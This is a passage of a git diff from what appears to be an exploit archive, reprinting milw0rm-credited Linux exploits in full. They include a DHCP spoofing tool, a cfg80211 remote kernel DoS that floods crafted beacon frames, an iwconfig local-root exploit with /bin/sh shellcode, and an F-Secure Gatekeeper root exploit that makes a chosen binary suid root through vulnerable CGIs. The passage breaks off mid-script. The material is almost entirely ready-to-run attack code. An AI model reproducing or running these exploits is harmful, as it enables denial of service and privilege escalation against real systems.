payload, payload_len); + ptr += payload_len; + + memcpy(ptr, "\xff", 1); + ptr += 1; + opt_len = ptr - options; + + /* construct full packet payload */ + memset(pktbuf, 0, sizeof(pktbuf)); + ptr = pktbuf; + + eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP); + ptr += ETH_HDR_LEN; + + ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); + ptr += IP_HDR_LEN; + + udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + ptr += UDP_HDR_LEN; + + memcpy(ptr, dhcp_h, DHCP_HDR_LEN); + ptr += DHCP_HDR_LEN; + + memcpy(ptr, options, opt_len); + ptr += opt_len; + + ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + + /* fire off malicious response */ + raw = eth_open(dev); + if (!raw) { + fprintf(stderr, "[-] error opening raw socket on %s\n", dev); + exit(1); + } + eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); + eth_close(raw); +} + +void +usage(char **argv) +{ + fprintf(stderr, "usage: %s [-i interface]\n", argv[0]); + exit(1); +} + +int +main(int argc, char **argv) +{ + int ch, ret; + char *dev = NULL; + char errbuf[PCAP_ERRBUF_SIZE]; + struct bpf_program bfp; + pcap_t *ph; + + opterr = 0; + + while ((ch = getopt(argc, argv, "i:")) != -1) { + switch (ch) { + case 'i': + dev = optarg; + break; + default: + usage(argv); + } + } + + if (!dev) { + dev = pcap_lookupdev(errbuf); + if (!dev) { + fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf); + exit(1); + } + } + + ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); + if (!ph) { + fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf); + exit(1); + } + + ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); + if (ret == -1) { + fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph)); + exit(1); + } + + pcap_setfilter(ph, &bfp); + if (ret == -1) { + fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph)); + exit(1); + } + + printf("[+] listening on %s: %s\n", dev, BPF_FILTER); + + pcap_loop(ph, -1, process, dev); + + return 0; +} + +// milw0rm.com [2009-07-27] diff --git a/platforms/linux/dos/9442.c b/platforms/linux/dos/9442.c index 2a5e14856..9e73907e1 100755 --- a/platforms/linux/dos/9442.c +++ b/platforms/linux/dos/9442.c @@ -1,176 +1,176 @@ -/* - * cfg80211-remote-dos.c - * - * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://patchwork.kernel.org/patch/41218/ - * - * These pointers can be NULL, the is_mesh() case isn't ever hit in the - * current kernel, but cmp_ies() can be hit under certain conditions. - * - * Usage: - * - * $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon - * $ airmon-ng start wlan0 - * ... - * $ ./cfg80211-remote-dos mon0 mac80211 - * [+] Initializing interface mon0... - * [+] Injecting crafted DoS beacon frames... - * - * Notes: - * - * The NULL pointer dereference is triggered if the victim scans and receives - * a beacon frame that does not contain a SSID IE and then receives another - * one that does have a SSID IE. Raw frame injection via LORCON is required - * on the wireless interface. This should only affect the 2.6.30 series. - */ - -#include -#include -#include -#include -#include - -#include -#include - -#define BEACON_NOSSID \ - "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x30\x4b" \ - "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ - "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ - "\x03\x01\x07" \ - "\x05\x04\x00\x01\x01\x00" \ - "\x2a\x01\x04" \ - "\x32\x04\x30\x48\x60\x6c" -#define BEACON_NOSSID_LEN 64 - -#define BEACON_SSID \ - "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x00\x03\x52\x00\x00\x00" \ - "\x30\x4b" \ - "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ - "\x00\x03\x44\x6f\x53" \ - "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ - "\x03\x01\x07" \ - "\x05\x04\x00\x01\x01\x00" \ - "\x2a\x01\x04" \ - "\x32\x04\x30\x48\x60\x6c" -#define BEACON_SSID_LEN 69 - -void -usage(char **argv) -{ - int i; - struct tx80211_cardlist *cardlist; - - printf("Usage: %s [interface] [drivername]\n", argv[0]); - - cardlist = tx80211_getcardlist(); - - if (cardlist == NULL) { - printf("Error accessing supported cardlist.\n"); - } else { - printf("\nSupported drivers are: "); - for (i = 1; i < cardlist->num_cards; i++) { - printf("%s ", cardlist->cardnames[i]); - } - printf("\n"); - } - tx80211_freecardlist(cardlist); -} - -int -main(int argc, char **argv) -{ - struct tx80211 tx; - struct tx80211_packet pkt; - char p1[BEACON_NOSSID_LEN]; - char p2[BEACON_SSID_LEN]; - int ret, drivertype; - uint8_t randbyte; - - if (argc < 3) { - usage(argv); - return 0; - } - - printf("[+] Initializing interface %s...\n", argv[1]); - - drivertype = tx80211_resolvecard(argv[2]); - if (drivertype == INJ_NODRIVER) { - printf("[-] Driver name not recognized.\n"); - exit(1); - } - - ret = tx80211_init(&tx, argv[1], drivertype); - if (ret < 0) { - printf("[-] Error initializing %s/%s", argv[1], argv[2]); - exit(1); - } - - ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON); - if (ret != 0) { - printf("[-] Error setting monitor mode.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - ret = tx80211_setchannel(&tx, 11); - if (ret < 0) { - printf("[-] Error setting channel.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - ret = tx80211_open(&tx); - if (ret < 0) { - printf("[-] Unable to open interface %s\n", tx.ifname); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - srand(time(NULL)); - - memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN); - memcpy(p2, BEACON_SSID, BEACON_SSID_LEN); - - printf("[+] Injecting crafted DoS beacon frames...\n"); - - while (1) { - randbyte = rand() & 0xff; - p1[15] = randbyte; - p1[21] = randbyte; - p2[15] = randbyte; - p2[21] = randbyte; - - pkt.packet = p1; - pkt.plen = BEACON_NOSSID_LEN; - if (tx80211_txpacket(&tx, &pkt) < 0) { - printf("[-] Unable to transmit packet.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - - pkt.packet = p2; - pkt.plen = BEACON_SSID_LEN; - if (tx80211_txpacket(&tx, &pkt) < 0) { - printf("[-] Unable to transmit packet.\n"); - printf("[-] %s.\n", tx80211_geterrstr(&tx)); - exit(1); - } - } - - tx80211_close(&tx); - - return 0; -} - -// milw0rm.com [2009-08-18] +/* + * cfg80211-remote-dos.c + * + * Linux Kernel < 2.6.30.5 cfg80211 Remote DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://patchwork.kernel.org/patch/41218/ + * + * These pointers can be NULL, the is_mesh() case isn't ever hit in the + * current kernel, but cmp_ies() can be hit under certain conditions. + * + * Usage: + * + * $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon + * $ airmon-ng start wlan0 + * ... + * $ ./cfg80211-remote-dos mon0 mac80211 + * [+] Initializing interface mon0... + * [+] Injecting crafted DoS beacon frames... + * + * Notes: + * + * The NULL pointer dereference is triggered if the victim scans and receives + * a beacon frame that does not contain a SSID IE and then receives another + * one that does have a SSID IE. Raw frame injection via LORCON is required + * on the wireless interface. This should only affect the 2.6.30 series. + */ + +#include +#include +#include +#include +#include + +#include +#include + +#define BEACON_NOSSID \ + "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x30\x4b" \ + "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ + "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ + "\x03\x01\x07" \ + "\x05\x04\x00\x01\x01\x00" \ + "\x2a\x01\x04" \ + "\x32\x04\x30\x48\x60\x6c" +#define BEACON_NOSSID_LEN 64 + +#define BEACON_SSID \ + "\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x00\x03\x52\x00\x00\x00" \ + "\x30\x4b" \ + "\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \ + "\x00\x03\x44\x6f\x53" \ + "\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \ + "\x03\x01\x07" \ + "\x05\x04\x00\x01\x01\x00" \ + "\x2a\x01\x04" \ + "\x32\x04\x30\x48\x60\x6c" +#define BEACON_SSID_LEN 69 + +void +usage(char **argv) +{ + int i; + struct tx80211_cardlist *cardlist; + + printf("Usage: %s [interface] [drivername]\n", argv[0]); + + cardlist = tx80211_getcardlist(); + + if (cardlist == NULL) { + printf("Error accessing supported cardlist.\n"); + } else { + printf("\nSupported drivers are: "); + for (i = 1; i < cardlist->num_cards; i++) { + printf("%s ", cardlist->cardnames[i]); + } + printf("\n"); + } + tx80211_freecardlist(cardlist); +} + +int +main(int argc, char **argv) +{ + struct tx80211 tx; + struct tx80211_packet pkt; + char p1[BEACON_NOSSID_LEN]; + char p2[BEACON_SSID_LEN]; + int ret, drivertype; + uint8_t randbyte; + + if (argc < 3) { + usage(argv); + return 0; + } + + printf("[+] Initializing interface %s...\n", argv[1]); + + drivertype = tx80211_resolvecard(argv[2]); + if (drivertype == INJ_NODRIVER) { + printf("[-] Driver name not recognized.\n"); + exit(1); + } + + ret = tx80211_init(&tx, argv[1], drivertype); + if (ret < 0) { + printf("[-] Error initializing %s/%s", argv[1], argv[2]); + exit(1); + } + + ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON); + if (ret != 0) { + printf("[-] Error setting monitor mode.\n"); + printf("[-] %s.\n", tx80211_geterrstr(&tx)); + exit(1); + } + + ret = tx80211_setchannel(&tx, 11); + if (ret < 0) { + printf("[-] Error setting channel.\n"); + printf("[-] %s.\n", tx80211_geterrstr(&tx)); + exit(1); + } + + ret = tx80211_open(&tx); + if (ret < 0) { + printf("[-] Unable to open interface %s\n", tx.ifname); + printf("[-] %s.\n", tx80211_geterrstr(&tx)); + exit(1); + } + + srand(time(NULL)); + + memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN); + memcpy(p2, BEACON_SSID, BEACON_SSID_LEN); + + printf("[+] Injecting crafted DoS beacon frames...\n"); + + while (1) { + randbyte = rand() & 0xff; + p1[15] = randbyte; + p1[21] = randbyte; + p2[15] = randbyte; + p2[21] = randbyte; + + pkt.packet = p1; + pkt.plen = BEACON_NOSSID_LEN; + if (tx80211_txpacket(&tx, &pkt) < 0) { + printf("[-] Unable to transmit packet.\n"); + printf("[-] %s.\n", tx80211_geterrstr(&tx)); + exit(1); + } + + pkt.packet = p2; + pkt.plen = BEACON_SSID_LEN; + if (tx80211_txpacket(&tx, &pkt) < 0) { + printf("[-] Unable to transmit packet.\n"); + printf("[-] %s.\n", tx80211_geterrstr(&tx)); + exit(1); + } + } + + tx80211_close(&tx); + + return 0; +} + +// milw0rm.com [2009-08-18] diff --git a/platforms/linux/dos/957.c b/platforms/linux/dos/957.c index 8d9ace807..b5a6eb1dc 100755 --- a/platforms/linux/dos/957.c +++ b/platforms/linux/dos/957.c @@ -275,6 +275,6 @@ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; -} - -// milw0rm.com [2005-04-26] +} + +// milw0rm.com [2005-04-26] diff --git a/platforms/linux/dos/958.c b/platforms/linux/dos/958.c index cf3d7637d..05ac899e2 100755 --- a/platforms/linux/dos/958.c +++ b/platforms/linux/dos/958.c @@ -332,6 +332,6 @@ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; -} - -// milw0rm.com [2005-04-26] +} + +// milw0rm.com [2005-04-26] diff --git a/platforms/linux/dos/959.c b/platforms/linux/dos/959.c index 6b3b78d0c..ab37f2103 100755 --- a/platforms/linux/dos/959.c +++ b/platforms/linux/dos/959.c @@ -239,6 +239,6 @@ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; -} - -// milw0rm.com [2005-04-26] +} + +// milw0rm.com [2005-04-26] diff --git a/platforms/linux/dos/998.c b/platforms/linux/dos/998.c index 40ed17b7b..aa89d9b65 100755 --- a/platforms/linux/dos/998.c +++ b/platforms/linux/dos/998.c @@ -132,6 +132,6 @@ return -1; } close(fd); return 0; -} - -// milw0rm.com [2005-05-17] +} + +// milw0rm.com [2005-05-17] diff --git a/platforms/linux/dos/999.c b/platforms/linux/dos/999.c index 6448cf9cf..3a2dc328e 100755 --- a/platforms/linux/dos/999.c +++ b/platforms/linux/dos/999.c @@ -101,6 +101,6 @@ static void init_plugin(GaimPlugin *plugin) { } -GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info) - -// milw0rm.com [2005-05-17] +GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info) + +// milw0rm.com [2005-05-17] diff --git a/platforms/linux/local/1009.c b/platforms/linux/local/1009.c index 12daf125c..4e0d49c0f 100755 --- a/platforms/linux/local/1009.c +++ b/platforms/linux/local/1009.c @@ -65,6 +65,6 @@ main() printf("Firing up exim - cross your fingers for shell!\n"); execve(exim[0],exim,0x0); return; -} - -// milw0rm.com [2005-05-25] +} + +// milw0rm.com [2005-05-25] diff --git a/platforms/linux/local/1029.c b/platforms/linux/local/1029.c index f4cbef639..82dd15c93 100755 --- a/platforms/linux/local/1029.c +++ b/platforms/linux/local/1029.c @@ -82,6 +82,6 @@ execl("./epsxe", "epsxe", "-nogui", buffer, 0); free(buffer); return 0; -} - -// milw0rm.com [2005-06-04] +} + +// milw0rm.com [2005-06-04] diff --git a/platforms/linux/local/106.c b/platforms/linux/local/106.c index 2c05f72d7..81baa45e6 100755 --- a/platforms/linux/local/106.c +++ b/platforms/linux/local/106.c @@ -98,6 +98,6 @@ sc_address & ALG_MASK); execve(argv[0],argv,envp); -} - -// milw0rm.com [2003-09-27] +} + +// milw0rm.com [2003-09-27] diff --git a/platforms/linux/local/1154.pl b/platforms/linux/local/1154.pl index ab65bf588..8da2553bb 100755 --- a/platforms/linux/local/1154.pl +++ b/platforms/linux/local/1154.pl @@ -142,6 +142,6 @@ print("cleaning up /tmp\n"); chdir("../../../"); system("rm -rf AAAA*/"); -# EOF - -# milw0rm.com [2005-08-16] +# EOF + +# milw0rm.com [2005-08-16] diff --git a/platforms/linux/local/1170.c b/platforms/linux/local/1170.c index 89d265b21..738b9334d 100755 --- a/platforms/linux/local/1170.c +++ b/platforms/linux/local/1170.c @@ -127,6 +127,6 @@ int main(int argc, char **argv){ #endif return 0; -} - -// milw0rm.com [2001-07-13] +} + +// milw0rm.com [2001-07-13] diff --git a/platforms/linux/local/1181.c b/platforms/linux/local/1181.c index 7605f6628..3161d26a4 100755 --- a/platforms/linux/local/1181.c +++ b/platforms/linux/local/1181.c @@ -68,6 +68,6 @@ int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) system(args->args[0]); return(0); -} - -// milw0rm.com [2004-12-24] +} + +// milw0rm.com [2004-12-24] diff --git a/platforms/linux/local/1187.c b/platforms/linux/local/1187.c index 48a4cff86..dcf9ea1eb 100755 --- a/platforms/linux/local/1187.c +++ b/platforms/linux/local/1187.c @@ -248,6 +248,6 @@ printf("[!] %s\n",err); if(e) exit(1); return; -} - -// milw0rm.com [2005-08-30] +} + +// milw0rm.com [2005-08-30] diff --git a/platforms/linux/local/1215.c b/platforms/linux/local/1215.c index 9f6461373..c073bdb34 100755 --- a/platforms/linux/local/1215.c +++ b/platforms/linux/local/1215.c @@ -1,55 +1,55 @@ -// (if the iwconfig executable is setuid) /str0ke - -#include -#include -#include -#include - -/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */ -char shellcode[]= - "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" - "\x73\x68\x68\x2f\x62\x69\x6e\x89" - "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" - "\x0b\x51\x52\x55\x89\xe5\x0f\x34" - "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" - "\x55\x89\xe5\x0f\x34"; - -int main(int argc,char **argv){ - char buf[96]; - long esp, *addr_ptr; - unsigned long ret; - int i, offset; - unsigned long sp(void) - { __asm__("movl %esp, %eax");} - char *prog[]={argv[1],buf,NULL}; - char *env[]={"3v1lsh3ll0=",shellcode,NULL}; - - if (argc >= 2) { - printf("\n*********************************************\n"); - printf(" iwconfig Version 26 Localroot Exploit \n"); - printf(" Coded by Qnix[at]bsdmail[dot]org \n"); - printf("*********************************************\n\n"); - } else { - printf("\n*********************************************\n"); - printf(" iwconfig Version 26 Localroot Exploit \n"); - printf(" Coded by Qnix[at]bsdmail[dot]org \n"); - printf("*********************************************\n\n"); - printf("\n USEAGE: ./iwconfig-exploit \n\n"); - return 1; - } - - offset = 0; - esp = sp(); - ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; - printf("[~] S-p.ESP : 0x%x\n", esp); - printf("[~] O-F.ESP : 0x%x\n", offset); - printf("[~] Return Addr : 0x%x\n\n", ret); - - memset(buf,0x41,sizeof(buf)); - memcpy(&buf[92],&ret,4); - - execve(prog[0],prog,env); - - } - -// milw0rm.com [2005-09-14] +// (if the iwconfig executable is setuid) /str0ke + +#include +#include +#include +#include + +/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 */ +char shellcode[]= + "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" + "\x73\x68\x68\x2f\x62\x69\x6e\x89" + "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" + "\x0b\x51\x52\x55\x89\xe5\x0f\x34" + "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" + "\x55\x89\xe5\x0f\x34"; + +int main(int argc,char **argv){ + char buf[96]; + long esp, *addr_ptr; + unsigned long ret; + int i, offset; + unsigned long sp(void) + { __asm__("movl %esp, %eax");} + char *prog[]={argv[1],buf,NULL}; + char *env[]={"3v1lsh3ll0=",shellcode,NULL}; + + if (argc >= 2) { + printf("\n*********************************************\n"); + printf(" iwconfig Version 26 Localroot Exploit \n"); + printf(" Coded by Qnix[at]bsdmail[dot]org \n"); + printf("*********************************************\n\n"); + } else { + printf("\n*********************************************\n"); + printf(" iwconfig Version 26 Localroot Exploit \n"); + printf(" Coded by Qnix[at]bsdmail[dot]org \n"); + printf("*********************************************\n\n"); + printf("\n USEAGE: ./iwconfig-exploit \n\n"); + return 1; + } + + offset = 0; + esp = sp(); + ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06; + printf("[~] S-p.ESP : 0x%x\n", esp); + printf("[~] O-F.ESP : 0x%x\n", offset); + printf("[~] Return Addr : 0x%x\n\n", ret); + + memset(buf,0x41,sizeof(buf)); + memcpy(&buf[92],&ret,4); + + execve(prog[0],prog,env); + + } + +// milw0rm.com [2005-09-14] diff --git a/platforms/linux/local/1297.py b/platforms/linux/local/1297.py index b9da7363f..527caa365 100755 --- a/platforms/linux/local/1297.py +++ b/platforms/linux/local/1297.py @@ -1,239 +1,239 @@ -#!/usr/bin/env python -# -# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 -# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke -# -############################################################################## -## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit -## acknowledgements: everyone in pure-elite and uDc. -## -## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] -############################################################################## - -############################################################################## -## Make proper checks and import nessesary calls from modules. -## - -try: - from sys import argv -except Exception: - print "the 'sys' module could not be loaded" - raise SystemExit - -try: - from os import unlink, stat, error, symlink, system, chmod -except Exception: - print "the 'os' module could not be loaded" - raise SystemExit - -try: - import getopt -except Exception: - print "the 'getopt' module could not be loaded" - raise SystemExit - -############################################################################## -## Constants. -## - -__program__ = argv[0] -__version__ = "0.1beta" -__author__ = "" -__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005" -__usage__ = """usage: %s [-options] - -options: - --version show program's version number and exit. - -h, --help show this help message and exit. - - -s, --suid file location to suid. - -d, --dir cgi directory. - -c, --clean cleans any left over files from the environment creation. - -# enter numerical value of vulnerable file to exploit. [list below] - - 1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi - 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi - 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi -10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi -13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi -16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__) - -####################################################################################### -## Functions. -## - -def _write(file, payload): - try: - open(file, 'w').write(payload) - chmod(file, 0100) - except Exception, err: - print ("[-] %s" % (err)) - -def _exists(path): - try: - stat(path) - except error: - return False - return True - -def _handleopts(): - for opt in argv[1:]: - if opt in ("-h", "--help"): - print "%s" % (__usage__), - raise SystemExit - if opt in ("-v", "--version"): - print "%s (%s)" % (__version__, __lastedit__), - raise SystemExit - - _method_ = 'ifconfig_suid.cgi' - _file_ = 'ifconfig.cgi' - for opt in argv[1:]: - if opt == "-1": - _method_ = 'ifconfig_suid.cgi' - elif opt == "-2": - _method_ = 'reboot_suid.cgi' - _file_ = 'reboot.cgi' - elif opt == "-3": - _method_ = 'proxy_suid.cgi' - _file_ = 'proxy.cgi' - elif opt == "-4": - _method_ = 'edittmpl_suid.cgi' - _file_ = 'edittmpl.cgi' - elif opt == "-5": - _method_ = 'version_suid.cgi' - _file_ = 'version.cgi' - elif opt == "-6": - _method_ = 'hostname_suid.cgi' - _file_ = 'hostname.cgi' - elif opt == "-7": - _method_ = 'gateway_suid.cgi' - _file_ = 'gateway.cgi' - elif opt == "-8": - _method_ = 'halt_suid.cgi' - _file_ = 'halt.cgi' - elif opt == "-9": - _method_ = 'edituserdb_suid.cgi' - _file_ = 'edituserdb.cgi' - elif opt == "-10": - _method_ = 'htpasswd_suid.cgi' - _file_ = 'htpasswd.cgi' - elif opt == "-11": - _method_ = 'pattern_up_suid.cgi' - _file_ = 'pattern_up.cgi' - elif opt == "-12": - _method_ = 'license_suid.cgi' - _file_ = 'license.cgi' - elif opt == "-13": - _method_ = 'iptables_suid.cgi' - _file_ = 'iptables.cgi' - elif opt == "-14": - _method_ = 'dns_suid.cgi' - _file_ = 'dns.cgi' - elif opt == "-15": - _method_ = 'pattern_autoup_suid.cgi' - _file_ = 'pattern_autoup.cgi' - elif opt == "-16": - _method_ = 'spam_list_suid.cgi' - _file_ = 'spam_list.cgi' - elif opt == "-17": - _method_ = 'diag_suid.cgi' - _file_ = 'diag.cgi' - else: - pass - - try: - opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \ - 'suid=', \ - 'dir='])[0] - except Exception, (err): - print "[-] %s" % (err), - raise SystemExit - - _dir_ = None - _payload_ = None - _combine_ = None - - for o, a in opts: - if o in ("-c", "--clean"): - _clean() - print "[*] done" - raise SystemExit - if o in ("-d", "--dir"): - if _exists(a): - _dir_ = a - else: - print "[-] unable to access the %s directory" % (_dir_), - raise SystemExit - if o in ("-s", "--suid"): - if _exists(a): - _payload_ = _suid(a) - else: - print "[-] unable to access binary." - raise SystemExit - - if _dir_ == None: - print "[-] no directory was given [try -h for help menu]" - raise SystemExit - if _payload_ == None: - print "[-] enter binary to suid [try -h for help menu]" - raise SystemExit - _combined_ = "%s/%s" % (_dir_, _method_) - if not _exists(_combined_): - print "[-] method not possible, try another." - raise SystemExit - - print "[*] creating environment..." - try: - symlink('%s/%s' % (_dir_, _method_), 'runbad') - _write(_file_, _payload_) - except Exception, err: - raise SystemExit - - -def _suid(file): - _suid_ = """#!/bin/sh -chown 0.0 %(file)s -chmod 4755 %(file)s -""" % (locals()) - return _suid_ - - -def _clean(): - try: - files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', - 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi', - 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi', - 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', - 'spam_list.cgi', 'diag_suid.cgi'] - - for file in files: - if _exists(file): unlink(file) - - except Exception, err: - print "[-] %s" % (err), - - -############################################################################## -## main() // main code. -## - -def main(): - try: - print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__) - print "[*] handling options, arguments..." - _handleopts() - print "[*] executing exploit..." - system('./runbad') - print "[*] cleaning..." - _clean() - print "[*] done... try executing the specified binary." - except KeyboardInterrupt: - print "[-] caught keyboard interuption" - raise SystemExit - except Exception, (err): - _clean() - raise SystemExit - -if __name__ == '__main__': main() - -# milw0rm.com [2005-11-07] +#!/usr/bin/env python +# +# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 +# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke +# +############################################################################## +## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit +## acknowledgements: everyone in pure-elite and uDc. +## +## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] +############################################################################## + +############################################################################## +## Make proper checks and import nessesary calls from modules. +## + +try: + from sys import argv +except Exception: + print "the 'sys' module could not be loaded" + raise SystemExit + +try: + from os import unlink, stat, error, symlink, system, chmod +except Exception: + print "the 'os' module could not be loaded" + raise SystemExit + +try: + import getopt +except Exception: + print "the 'getopt' module could not be loaded" + raise SystemExit + +############################################################################## +## Constants. +## + +__program__ = argv[0] +__version__ = "0.1beta" +__author__ = "" +__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005" +__usage__ = """usage: %s [-options] + +options: + --version show program's version number and exit. + -h, --help show this help message and exit. + + -s, --suid file location to suid. + -d, --dir cgi directory. + -c, --clean cleans any left over files from the environment creation. + -# enter numerical value of vulnerable file to exploit. [list below] + + 1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi + 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi + 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi +10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi +13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi +16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__) + +####################################################################################### +## Functions. +## + +def _write(file, payload): + try: + open(file, 'w').write(payload) + chmod(file, 0100) + except Exception, err: + print ("[-] %s" % (err)) + +def _exists(path): + try: + stat(path) + except error: + return False + return True + +def _handleopts(): + for opt in argv[1:]: + if opt in ("-h", "--help"): + print "%s" % (__usage__), + raise SystemExit + if opt in ("-v", "--version"): + print "%s (%s)" % (__version__, __lastedit__), + raise SystemExit + + _method_ = 'ifconfig_suid.cgi' + _file_ = 'ifconfig.cgi' + for opt in argv[1:]: + if opt == "-1": + _method_ = 'ifconfig_suid.cgi' + elif opt == "-2": + _method_ = 'reboot_suid.cgi' + _file_ = 'reboot.cgi' + elif opt == "-3": + _method_ = 'proxy_suid.cgi' + _file_ = 'proxy.cgi' + elif opt == "-4": + _method_ = 'edittmpl_suid.cgi' + _file_ = 'edittmpl.cgi' + elif opt == "-5": + _method_ = 'version_suid.cgi' + _file_ = 'version.cgi' + elif opt == "-6": + _method_ = 'hostname_suid.cgi' + _file_ = 'hostname.cgi' + elif opt == "-7": + _method_ = 'gateway_suid.cgi' + _file_ = 'gateway.cgi' + elif opt == "-8": + _method_ = 'halt_suid.cgi' + _file_ = 'halt.cgi' + elif opt == "-9": + _method_ = 'edituserdb_suid.cgi' + _file_ = 'edituserdb.cgi' + elif opt == "-10": + _method_ = 'htpasswd_suid.cgi' + _file_ = 'htpasswd.cgi' + elif opt == "-11": + _method_ = 'pattern_up_suid.cgi' + _file_ = 'pattern_up.cgi' + elif opt == "-12": + _method_ = 'license_suid.cgi' + _file_ = 'license.cgi' + elif opt == "-13": + _method_ = 'iptables_suid.cgi' + _file_ = 'iptables.cgi' + elif opt == "-14": + _method_ = 'dns_suid.cgi' + _file_ = 'dns.cgi' + elif opt == "-15": + _method_ = 'pattern_autoup_suid.cgi' + _file_ = 'pattern_autoup.cgi' + elif opt == "-16": + _method_ = 'spam_list_suid.cgi' + _file_ = 'spam_list.cgi' + elif opt == "-17": + _method_ = 'diag_suid.cgi' + _file_ = 'diag.cgi' + else: + pass + + try: + opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \ + 'suid=', \ + 'dir='])[0] + except Exception, (err): + print "[-] %s" % (err), + raise SystemExit + + _dir_ = None + _payload_ = None + _combine_ = None + + for o, a in opts: + if o in ("-c", "--clean"): + _clean() + print "[*] done" + raise SystemExit + if o in ("-d", "--dir"): + if _exists(a): + _dir_ = a + else: + print "[-] unable to access the %s directory" % (_dir_), + raise SystemExit + if o in 